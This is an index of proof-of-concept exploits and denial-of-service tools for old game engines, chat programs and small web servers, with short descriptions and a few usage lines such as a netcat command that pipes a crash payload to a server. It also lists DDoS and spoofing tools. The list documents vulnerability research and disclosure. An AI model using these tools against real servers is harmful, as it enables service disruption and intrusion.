- Call of Duty <= 1.4 server/client shutdown 0.1.1 (codboom)
- Ground Control <= 1.0.0.7 server/client crash 0.1 (gc2boom)
- Painkiller <= 1.31 code execution bug 0.1 (painkex)
- Medal of Honor buffer-overflow 0.1 (mohaabof)
Vulnerables: AA 1.11v9, SH 2.15, BT 2.40b
- Unreal engine \secure\ crash 0.1 (unsecure)
and the spoofed version for Linux
- Chat Anywhere <= 2.72a DoS and passive browsers DoS 0.1 (chatanydos)
- Toca Race Driver 1 multiple DoS 0.1.1 (rdboom)
- Colin McRae Rally 04 1.0 broadcast client crash 0.1 (cmr4cdos)
- UMOD arbitrary file overwriting proof-of-concept maker 0.1 (umodpoc)
- DoS in Rsniff 1.0 (emptyconn)
Use "emptyconn server 10001"
- IGI 2 <= 1.3 server RCON format string 0.1 (igi2fs)
- Gangland client click and freeze bug 0.1 (gangcfreeze)
Explanation is located in the file gangcfreeze.c
- StarShatter Fake Players DoS (sshatfp)
fake players and server freeze/crash (<= 3.9.0 versions)
- Testing tool for RogerWilco 0.4 (wilco)
This proof-of-concept is able to test ALL the vulnerabilities I have found in this program.
Then it contains also a lot of very useful functions and shows a lot of information
- Etherlords 1 (1.07) and 2 (1.03) server crash 0.1 (ethboom)
- Picophone <= 1.63 log buffer overflow and DoS 0.1 (picobof)
- The Rage remote server freeze 0.1 (ragefreeze)
- Terminator 3 <= 1.0 broadcast client buffer-overflow 0.1.2 (t3cbof)
- Chrome <= 1.2.0.0 server crash 0.1 (chromeboom)
- Battle Mages automatic LAN server freeze 0.1 (battlemagx)
- Battle Mages server freeze 0.1 (battlemagy)
- Battle Isle: The Andosia War 2.08 remote client crash/freeze 0.1a (bisle-client)
- Battle Isle: The Andosia War 2.08 remote server crash 0.1 (bisleboom)
- Chat Anywhere 2.72 ghost user proof-of-concept (ca-ghost)
html file that sends %00 (hidden nickname) in plain-text because almost all the browsers sends it encoded as %2500
- Freespace <= 1.2 client buffer overflow 0.1 (fs2cbof)
- RedFaction <= 1.20 broadcast clients buffer overflow 0.1 (rfcbof)
- Red Faction demo and retail 1.00 server buffer overflow 0.1 (rfdbof)
works versus any demo version and the too old retail version 1.00
- Gamespy hidden cd-key SDK: remote server crash 0.1.1 (gshboom)
Vulnerable games: Battlefield 1942, Contract Jack, Gore, Halo, Hidden & Dangerous 2, IGI 2: Covert Strike, Judge Dredd: Dredd vs. Death, Need For Speed Hot Pursuit 2, TRON 2.0 and others...
- Ghost Recon engine remote crash/system freeze 0.1 (grboom)
- Haegemonia <= 1.07 remote and Desert Rats vs. Afrika Korps server crash 0.1.1 (hgmcrash)
- Team Factor <= 1.25m remote server crash 0.1 (tfboom)
- Purge <= 1.4.7 and Jihad <= 2.0.1 broadcast client's buffer overflow 0.1 (purge-cbof)
- Ratbag's game engine Denial of Service 0.1 (ratbagcpu)
- Monkey httpd <= 0.8.1 remote DoS 0.1 (monkeydos)
- Chaser <= 1.50 remote client crash (both LAN and Internet) 0.1a (chaser-client)
- Chaser <= 1.50 remote server crash 0.1 (chasercrash)
- Big Scale Racing <= 1.04h Fake players DoS and crasher/freezer (bsrfpcrash)
- Need for Speed Hot pursuit 2 <= 242 client's buffer overflow (nfshp2cbof)
- Xitami <= 2.5c1 server crash and possible (???) code execution through malformed SSI files (ssi-xitami)
In the zip file are contained some examples of SSI files to use locally on Xitami webserver to crash it, but probably the most interesting example is toobig.ssi that is able to point the code flow to 0x58585858 (tested on Win32) but I'm not able to say if code execution is really possible and I don't have other info about the problem
- WebCam Live 2.01 and PhotoHost 4.0 negative Content-Length DoS 0.1 (wcamdos)
- Resources consumption in Goahead webserver <= 2.1.8 (webpostmem)
- WWW Fileshare Pro < 2.42 remote crash (webpostmem)
"webpostmem 2000 1 server" or "webpostmem 3000 1 server"
- WWW Fileshare Pro < 2.42 arbitrary files overwriting (wfshare-up)
this file contains the data to send to the server to create a file called badfile.txt in c:\
- Worms Armageddon (LAN) Fake invisible players DoS and match freeze 0.1 (wormsafp)
it is not only a fake players DoS but also freezes a bit the current match. It works only versus LAN servers and I have tested it only versus the version 3.0.5.0beta2
- Jordan's Windows Telnet Server remote buffer-overflow 0.1 (jordwts)
- Serious Sam TCP remote crash/freeze 0.1 (ssboom)
This proof-of-concept should run versus all the games based on the Serious Sam engine using TCP protocol. Serious Same first and second encounter <= 1.05 are vulnerables (Second Sncounter 1.07 is NOT vulnerable because uses UDP)
- Soldat permanent ban of a custom IP 0.1 (soldbanip)
this simple proof-of-concept sends an incomplete spoofed UDP packet to join a server of the game called Soldat. The result is the permanent ban of the source IP (runs on GNU/Linux only)
Remember to update the join packet because new game versions use different packets!
- Tzar <= 1.10 fake players bug and remote crash (tzarff)
- Medieval Total War <= 1.1 broadcast kick and crash 0.1 (mtwdos-server)
(first argument equal to 0 = kick, major equal than 76 = crash)
- Medieval Total War <= 1.1 client's bugs 0.1 (mtw2client)
- Fake IRC server for Gamespy3d <= 263015 code execution 0.1 (gs3dirc)
- Half-Life 1.1.1.0 client's "Unknown command" format string bug test 0.1a (hlclientfs)
This is a tool to test a format string bug I have found in the Half-Life client. I have not released an advisory because at the moment I don't know if this bug lets remote code execution or not. Feel free to check it (in the zip file there is also the mail I have sent to vuln-dev containing some details)
- NULLhttpd <= 0.5.1 remote resources consumption (webpostmem)
- NULLhttpd <= 0.5.1 XSS through Bad request (nullhttpd051-xss)
- SpeakFreely for Win <= 7.6a remote crash through malformed GIF (sfgif)
- SpeakFreely for Win <= 7.6a spoofed DoS (sfdos)
- Winamp 2.91 (IN_MIDI.DLL 3.01) examples (winamp-midi-example)
- Quake 3 engine client disconnector 0.2 (q3noclient)
how to disconnect a client based on the Quake 3 engine with only one spoofed packet
- Half-Life server buffer overflow and freeze 0.2.2 (hlbof-server)
Simple proof-of-concept for testing the vulnerable Half-Life servers. It will shows a message in console if you test the dedicated server 1.1.1.0 likewise the return address will be overwritten by 0x063c27f5
01 Mar 2004: Greuff (greuff@void.at) has released an exploit about this vulnerability: http://www.void.at/greuff/hoagie_hlserver.c
- Half-Life <= 1.1.1.0 passive buffer-overflow test 0.1 (hlbof-client)
This proof-of-concept waits vulnerable Half-life clients and crashs them. Use a debugger to see the exception and the overwritten return address (overwritten by 0x2e504945)
- Quake 3 con/con proof-of-concept + heartbeat emulator (q3concon)
this proof-of-concept is a fake Quake 3 server that sends a message containing the con\con string to all the clients that try to get information from it. If the client that receives the string is a Windows95/98/98SE system without the con\con patch it will be crashed immediately. The problem happens on some games based on the Quake 3 engine. I have personally tested Quake 3 and Soldier of Fortune 2. The games I have tested and are NOT vulnerables are Return to Castle Wolfenstein and Medal of Honor: Allied Assault
- UnrealTournament 2003 Passive DoS (ut2003pdos)
vulnerable versions: retail v2199 and v2206 demo without fixed IpDrv library
- Edonkey2000 and Overnet <= 0.45 message flooder and Emule <= 0.27b remote crasher 0.1.1 (eddos)
- Master Server full DDoS tool 0.1.1 (msddos)
(+ Quake3 Master server statistics!)
- Unreal engine research Proof-of-Concept (research)
(UT2003 versions major than 2166 and UT major than 436 are NOT vulnerables, I don't know what are the games still vulnerables)
- Unreal eater/crasher (unrcrash) 0.2.2 (unrcrash)
UDP packet for eating memory or crashing remote systems that run a game based on the Unreal engine (Unreal 1 is not vulnerable)
- UnrDoS 0.1 (unrdos)
Unreal engine network loopback DoS (successfully tested versus UT and UT2003)
- UT2003Bounce 0.1 (ut2003bounce)
Ping-pong network proof-of-concept for Unreal Tournament 2003 (UT2003 ONLY)
- UT v436 code execution (Win98 ONLY) (ut436)
This proof-of-concept must be used with the Windows version of UnrealTournament v436 (both UCC and game) on Win98 ONLY. It contains 2 map files that spawn a simple message in console for UCC or a MessageBox for the game.
If you use UCC: copy ut-ucc436.unr in Maps dir and run "ucc server ut-ucc436.unr"
If you use the game: copy DM-ut436.unr in Maps dir, run the UT game and select the map from Deathmatch maps
- Unreal eater/crasher (unrcrash) 0.2.2 (unrcrash)
- Bladeenc 0.94.2 for Windows i586 proof-of-concept (for Win98 ONLY) (blade586-942)
the PoC is based on the precompiled binary you can find here
- Savant 3.1 cgitest.exe blue-screen, crash & close
Usage: nc <host> 80 -v -v -n < savant-cgitest.txt
- Abyss 1.0.3 (patch 1) administration bug (abyss-adm)
- Pegasus mail 4.01 DoS (pegasus)
- Popcorn mail client 1.20 multiple DoS attacks (popcorn)
- Unreal Tournament single DDoS (utflood)
- CheckBo 1.56 multiple DoS (poc 0.2) (checkbo)
- UTDDoS 0.4 (utddos)
full DoS & DDoS attack using UnrealTournament and UT2003 servers. This code is very interesting also for who wants to know how to get the servers'list from the official master servers used by Epic because it can retrieve both UT and UT2003 lists (note that UT > 436 and UT2003 > 2166 are NO longer vulnerable to this passive DoS)